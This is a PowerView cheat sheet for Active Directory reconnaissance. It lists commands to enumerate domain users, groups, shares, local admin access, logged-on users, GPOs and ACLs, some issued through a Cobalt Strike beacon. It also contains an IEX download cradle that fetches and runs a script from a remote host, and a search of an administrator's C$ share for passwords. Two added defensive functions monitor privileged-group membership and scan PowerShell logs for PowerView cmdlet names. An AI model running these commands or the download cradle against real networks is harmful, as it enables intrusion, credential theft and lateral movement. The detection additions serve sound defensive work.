# PowerView


### Enumeration

```powershell
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

# PowerView
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/view.ps1');

# Domain Info
Get-Domain
Get-DomainController

# Password Policy
(Get-DomainPolicy)."SystemAccess"
Get-DomainPolicyData | select -ExpandProperty SystemAccess

# Enumerate Domain Users
Get-DomainUser | select samaccountname

# Enumerate Domain User Properties
Get-DomainUser -Properties description,pwdlastset

# Get Detailed Information About a Specific Domain User
Get-DomainUser -Identity user1

# Enumerate Domain Groups
Get-DomainGroup | select samaccountname

# Get Domain Groups That Contain The Word "admin"
Get-DomainGroup *admin* | select samaccountname

# Enumerate Domain Computers
Get-DomainComputer | select cn
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

# Enumerate Domain Computers That Respond To Ping
Get-DomainComputer -Ping | select cn

# Enumerate Domain OUs
Get-DomainOU | select name

# Enumerate Domain Group Members
Get-DomainGroupMember -Identity "Domain Admins"

# Enumerate Nested Group Members (Recursive)
Get-DomainGroupMember -Identity "Domain Admins" -RecurseUsingMatchingRule | select groupname,membername,memberobjectclass

# Enumerate The Groups a User Belongs To
Get-DomainGroup -UserName 'hsaad' | select samaccountname,memberof
```
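The same group-membership queries double as a monitoring control: a defender who records the effective membership of a privileged group once can diff it on every later run and be alerted to unexpected additions. The function below is an added example, not part of the original page or of PowerView itself. It assumes PowerView has already been imported (so `Get-DomainGroupMember` is available); the baseline file path and the `Get-PrivilegedGroupBaseline` name are hypothetical choices for this example.

```powershell
# Added example (not from the original page): record the recursive membership of a
# privileged group and report members added or removed since the last recorded baseline.
# Assumes PowerView is loaded in the current session.
function Get-PrivilegedGroupBaseline {
    param(
        [string]$GroupName    = 'Domain Admins',
        # Hypothetical default location for the baseline file
        [string]$BaselinePath = (Join-Path $env:TEMP (($GroupName -replace '\s', '_') + '-baseline.json'))
    )

    # Effective (nested) membership resolved to member names, sorted for a stable comparison
    $current = @(Get-DomainGroupMember -Identity $GroupName -Recurse |
                 Select-Object -ExpandProperty MemberName |
                 Sort-Object -Unique)

    if (-not (Test-Path -Path $BaselinePath)) {
        # First run: persist the current state as the baseline. -InputObject keeps a
        # single-member group serialized as a JSON array rather than a bare string.
        ConvertTo-Json -InputObject $current | Set-Content -Path $BaselinePath
        return [pscustomobject]@{
            Group           = $GroupName
            Added           = @()
            Removed         = @()
            BaselineCreated = $true
        }
    }

    $baseline = @(Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json)

    # Set difference in both directions; -notin avoids Compare-Object's empty-array restrictions
    $added   = @($current  | Where-Object { $_ -notin $baseline })
    $removed = @($baseline | Where-Object { $_ -notin $current })

    [pscustomobject]@{
        Group           = $GroupName
        Added           = $added
        Removed         = $removed
        BaselineCreated = $false
    }
}

# Usage: run once to create the baseline, then on a schedule; non-empty Added/Removed is the alert condition
Get-PrivilegedGroupBaseline -GroupName 'Domain Admins'
```

Because the check works on the recursive member list, a user placed into a nested group that is itself a member of Domain Admins shows up in `Added` just as a direct addition would, which is the case a direct-membership comparison misses.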

### Open Shares

```powershell
# Enumerate Open Shares
Get-NetShare -ComputerName WorkStation1

# Enumerate Open Shares on All Domain Computers (Get-DomainComputer + Get-NetShare)
Find-DomainShare

# Enumerate Open Shares To Which You Have Read Access
Find-DomainShare -CheckShareAccess

# Search For Interesting Files Inside Shares
Find-InterestingFile -Path \\workstation1\c$\

# Search For Interesting Keywords Inside Files on Shares
findstr /spin /c:"password" \\workstation1\c$\users\administrator\*.txt

# Find Interesting Domain Share Files (Get-DomainComputer + Get-NetShare + Find-InterestingFile)
Find-InterestingDomainShareFile -Verbose
```

### Local Groups

```powershell
# Enumerate Local Groups on Computer WorkStation1
Get-NetLocalGroup -ComputerName WorkStation1

# Enumerate Local Group Members Of The Administrators Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Administrators"

# Enumerate Local Group Members Of The Remote Desktop Users Group on Computer WorkStation1
Get-NetLocalGroupMember -ComputerName WorkStation1 -GroupName "Remote Desktop Users"

# Enumerate Local Group Members on All Domain Computers (Get-DomainComputer + Get-NetLocalGroupMember)
Find-DomainLocalGroupMember -GroupName "Administrators"
```

### Local Admin Access

```powershell
# Test Admin Access Rights on a Computer
Test-AdminAccess -ComputerName workstation1

# Test Admin Access Rights on All Domain Computers (Get-DomainComputer + Test-AdminAccess)
Find-LocalAdminAccess -Verbose
```

### User Hunting

```powershell
# Enumerate User Sessions (Reference: https://www.youtube.com/watch?v=q86VgM2Tafc)
Get-NetSession -ComputerName WorkStation1

# Enumerate Logged-On Users
Get-NetLoggedon -ComputerName workstation1

# Get Domain Admins + Run Get-NetSession/Get-NetLoggedon on Every Domain Computer + Compare The Results
Find-DomainUserLocation

# Perform Against High-Traffic Servers Only (Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController)
Find-DomainUserLocation -Stealth

# Run Get-NetSession/Get-NetLoggedon on Every Domain Computer, Then Print All Results
Find-DomainUserLocation -ShowAll

# Perform Against Different Users or Groups
Find-DomainUserLocation -UserGroupIdentity "local_admin"
Find-DomainUserLocation -UserIdentity "ITSupport"
```
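The user-hunting functions above contact every domain computer, and the whole toolkit runs as PowerShell in memory, so the script text itself is one of the most reliable places to look for it. The function below is an added example written from the detection side; it is not from the original page or from PowerView. It searches PowerShell script block logs (Event ID 4104 in `Microsoft-Windows-PowerShell/Operational`) for the cmdlet names used on this page. It assumes script block logging is enabled on the host being queried; the function name and the default indicator list are choices made for this example.

```powershell
# Added example (not from the original page): triage script block logs for PowerView cmdlet names.
# Assumes PowerShell script block logging (Event ID 4104) is enabled on the host.
function Find-PowerViewScriptBlocks {
    param(
        [int]$Hours = 24,
        # Cmdlet names taken from this page; extend as needed
        [string[]]$Indicators = @(
            'Get-DomainUser', 'Get-DomainComputer', 'Find-DomainShare',
            'Find-LocalAdminAccess', 'Get-NetSession', 'Get-NetLoggedon',
            'Find-DomainUserLocation', 'Get-DomainGPOLocalGroup', 'Find-InterestingDomainAcl'
        )
    )

    # Build one alternation regex from the escaped indicator names
    $pattern = ($Indicators | ForEach-Object { [regex]::Escape($_) }) -join '|'

    # Get-WinEvent throws when nothing matches the filter; treat that as "no events"
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    foreach ($event in $events) {
        # For 4104 the EventData fields are MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
        $text = [string]$event.Properties[2].Value
        if ($text -match $pattern) {
            [pscustomobject]@{
                Time     = $event.TimeCreated
                Computer = $event.MachineName
                Matched  = ($Indicators | Where-Object { $text -like "*$_*" }) -join ','
                Excerpt  = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Usage: review the last day of script block logs on this host
Find-PowerViewScriptBlocks -Hours 24 | Format-Table -AutoSize
```

Matching on function names is a cheap triage filter rather than a complete detection: it only flags script text that still carries these names, so pair it with the network-side signal that `Find-DomainUserLocation` produces, namely one account opening sessions against many hosts in a short window.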

### Domain Group Policy

```powershell
# Enumerate All Domain Group Policies
Get-DomainGPO | select DisplayName
Get-DomainGPO -Name "{AD7EE1ED-CDC8-4994-AE0F-50BA8B264829}" -Properties DisplayName

# Enumerate All Domain Group Policies Applied To This Computer
Get-DomainGPO -ComputerName WorkStation1

# Enumerate Local Admin Access Through Domain Group Policies
# Get-DomainGPO + Search For \SecEdit\GptTmpl.inf AND \Preferences\Groups\Groups.xml
Get-DomainGPOLocalGroup -Verbose

# Find Computers Where a Domain Group Is Mapped Into a Local Group By GPO (Restricted Groups / Group Policy Preferences)
Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
```

### ACL

```powershell
# Enumerate All Domain ACLs Granting Modification Rights To Non-Built-In Principals
Find-InterestingDomainAcl -ResolveGUIDs | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN
```

### SharpView

SharpView is a C# port of PowerView: https://github.com/tevora-threat/SharpView

```powershell
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Debug\SharpView.exe Get-Domain
```

